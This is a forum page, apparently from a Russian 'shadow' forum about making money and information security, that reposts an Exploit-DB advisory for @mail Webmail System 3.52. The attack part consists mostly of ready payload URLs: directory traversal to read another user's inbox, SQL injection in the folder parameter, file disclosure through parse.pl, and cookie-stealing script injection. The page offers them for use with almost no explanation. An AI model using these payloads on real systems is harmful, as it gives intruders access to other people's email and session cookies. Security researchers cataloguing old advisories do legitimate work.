calacode @mail webmail system 3.52 - Multiple Vulnerabilities | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 23421

Проверка EDB

Пройдено

Автор: NICK GUDOV

Тип уязвимости: WEBAPPS

Платформа: CGI

CVE: N/A

Дата публикации: 2003-12-09

Код:

source: https://www.securityfocus.com/bid/9180/info

It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.

http://www.example.com/showmail.pl?Folder=../../[email protected]/mbox/Inbox

http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='[email protected]&print=1

http://www.example.com/parse.pl?file=html/english/xp/xplogin.html

http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script>

Источник: www.exploit-db.com

Поиск

Exploit calacode @mail webmail system 3.52 - Multiple Vulnerabilities

Exploiter

Похожие темы